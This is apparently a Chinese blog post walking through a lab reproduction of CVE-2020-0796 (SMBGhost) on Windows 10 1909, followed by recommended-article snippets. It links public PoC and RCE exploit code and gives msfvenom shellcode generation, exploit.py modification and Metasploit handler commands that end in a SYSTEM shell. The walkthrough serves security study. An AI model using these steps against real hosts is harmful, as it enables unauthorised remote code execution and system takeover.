CVE-2020-0796(永恒之黑)复现,影响版本windws10,windos server2016

最新推荐文章于 2023-08-28 19:40:50 发布
最新推荐文章于 2023-08-28 19:40:50 发布
阅读量4.3w 收藏 5
点赞数 3
分类专栏: CVE漏洞 文章标签: 安全漏洞 windows 安全 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39583774/article/details/119218570
版权

漏洞介绍

https://nvd.nist.gov/vuln/detail/CVE-2020-0796

漏洞影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server 2016, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server 2016, Version 1909 (Server Core installation)

漏洞复现

1.环境准备
windows 10 1909:ed2k://|file|cn_windows_10_business_editions_version_1909_updated_dec_2019_x64_dvd_262ac8af.iso|5301471232|FD9D7DD90D16FA14A682AEF49F8E712B|/
#下载完成后关闭自动更新

POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC
getshell下载:https://github.com/chompie1337/SMBGhost_RCE_PoC

主机ip
kali192.168.252.128
windows 10 1909(关防火墙)192.168.252.147

在这里插入图片描述
在这里插入图片描述

测试开始

上传测试脚本CVE-2020-0796-PoC-master和getshell到kali

进入poc执行测试脚本

python3 CVE-2020-0796.py 192.168.252.147

在这里插入图片描述
windows 10 蓝屏重启,说明存在漏洞。

使用msfvenom命令生成shellcode代码

msfconsole
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -f py -o shellcode.txt

在这里插入图片描述
复制shellcode.txt内容进入SMBGhost_RCE_PoC-master编辑exploit.py
将USER_PAYLOAD段全部删除
在这里插入图片描述

将刚刚shellcode.txt内容修改后复制进去
将buf
在这里插入图片描述
在这里插入图片描述
上传刚刚修改好的getshell到kali

在这里插入图片描述
进入kali中的msf模块打开监听模块

use exploit/multi/handler #选择监听模块
set payload windows/x64/meterpreter/bind_tcp #使用监听模块
set lport 4444  #监听端口
set rhost 192.168.205.134  # 目标主机
run #运行

在这里插入图片描述

新开一个kali的shell运行exploit.py反弹shell

如果这里执行不成功,多执行几次就行。
python3 exploit.py -ip 192.168.252.147

在这里插入图片描述
这里监听也是,如果不成功ctrl+c,重新运行几次就好了
在这里插入图片描述

这里已经成功获取windows 10 shell

chcp 65001 #解决乱码

在这里插入图片描述
查看权限发现是system权限,这个漏洞导致微软强制1909版本升级,还是比较大的漏洞了。
在这里插入图片描述

0x717866
关注
专栏目录
cve-2020-0796-永恒
qq_44862597的博客
06-07 985
CVE-2020-0796-永恒:RCE 文章目录CVE-2020-0796-永恒:RCE0x01 协议0x02 漏洞概述0x03 影响版本0x04 win10镜像,漏洞POC复现 0x01 协议 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。 0x02 漏洞概述 该漏洞是由于smb协议在处理恶意的压缩包时出错造成的。它可以远程执行未经身份验证的系统上执行任意代码。该漏洞十分接近永恒之蓝,所以叫做永恒,且该漏洞一旦获取权
CVE-2020-0796(永恒)漏洞复现
m0_73263892的博客
06-30 687
靶机:win 10攻击机:kalipython脚本:链接:https://pan.baidu.com/s/1GgInswJJC2RkSGdJk1_V5g?pwd=kt4r提取码:kt4r。
CVE-2020-0796,又是一场补丁攻坚战
03-16 1620
每年真正比较有影响力的漏洞编号,其实并不多,而这个CVE-2020-0796,就是我们在疫情之下全面返岗伊始,最值得去重视的一个。2020年3月12日晚...
CVE-2020-0796 RCE复现
子曰小玖的博客
07-10 417
0x01 简介 SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。 0x02 漏洞概述 **(CVE-2020-0796 SMBGhost)**该漏洞是由于SMBv3协议在处理恶意的压缩数据包时出错所造成的,它可让远程且未经身份验证的攻击者在目标系统上执行任意代码。该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。 0
CVE-2020-0796永恒) getshell
小石头的博客
06-05 2214
前期准备 Windows10 1903版本下载:http://www.xitongtiandi.net/wenzhang/zuixin/33042.html 迅雷下载Windows10 pro1903 x64: thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa CVE-202...
Windows Hyper-V远程信息泄露漏洞CVE-2017-8712 影响Win2016win10
weixin_33898233的博客
09-01 239
12日,Windows Hyper-V被爆出远程信息泄露漏洞CVE-2017-8712,攻击者利用这个漏洞可以获取敏感信息,以便发起进一步的攻击。这个漏洞影响Win2016win10的相关版本。 微软在官方网站确认了该漏洞,但没有发布任何的缓解措施 https://portal.msrc.microsoft.com/en-US/security-g...
永恒之蓝漏洞原理 445_比"永恒之蓝"还恐怖的"永恒"来了 注意以下版本的记得打补丁...
weixin_39564617的博客
11-30 861
2017年4月份14日晚间的时候,爆发了一场永恒之蓝的病毒,当时企业或者事业单位的主机都受到影响。编号为MS17 010 (永恒之蓝)该漏洞利用smbv1协议存在漏洞,扫描开放445端口的主机,进行锁机勒索等非法行为。近日又爆出编号为CVE2020­-0796该漏洞也是利用smb协议漏洞,不过与永恒之蓝不同之处在于,它利用的是smbv3协议。在smbv3协议上发现了远程代码执行漏洞,可导致服务...
CVE-2020-0796 POC 永恒 POC SMBGhost POC
10-15
CVE-2020-0796 POC 利用SMBv3远程代码执行漏洞 POC 永恒 POC SMBGhost POC 建议用户及时使用POC自查,如存在漏洞及时进行安全加固
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的...
83-83.渗透测试-CVE-2020-0796 永恒漏洞.mp4
最新发布
05-10
83-83.渗透测试-CVE-2020-0796 永恒漏洞.mp4
CVE-2020-0796-POC.py
03-19
微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Offic文档等多种方式触发漏洞进行攻击,对存在该漏洞的Windows主机造成严重威胁。
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796poc检测代码。 CVE-2020-0796本地exp执行代码。
CVE-2020-0796
m_de_g的博客
10-08 6806
CVE-2020-0796(永恒) 一.对应出现的版本 永恒的对象为采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。 原理为由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 首先下载 CVE-2020
Metasploit系列 -- CVE-2020-0796(永恒)getshell
weixin_41489908的博客
06-04 2685
会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。 ---- 网易云热评 本篇内容来自雷石安全实验室。 一、漏洞描述: 该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。 二、测试环境及工具: windows10 1903 64位下载: ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|490547.
CVE-2020-0796漏洞复现
weixin_63960760的博客
08-28 287
2020年3月10日,微软在其官方SRC发布了CVE-2020-0796安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
CVE-2020-0796永恒漏洞复现
Martin-share的博客
02-15 965
2020年3月12日,微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒”。本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒一旦被成功利用,其危害不亚于永恒之蓝。受影响版本:set lhost。
永恒CVE-2020-0796
m0_57379855的博客
04-01 5320
永恒CVE-2020-0796CVE-2020-0796 永恒漏洞 CVE-2020-0796 永恒漏洞 永恒漏洞与“永恒之蓝”漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。 漏洞危害等级:高危 “永恒”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。 漏洞成因: CVE-2020-0796 漏洞存在于受影响版本Windows 驱动
CVE-2020-0796永恒”漏洞复现
longanquan的博客
08-14 2247
永恒2020年报出来的Windows10的系统漏洞 受影响版本Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0x717866

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值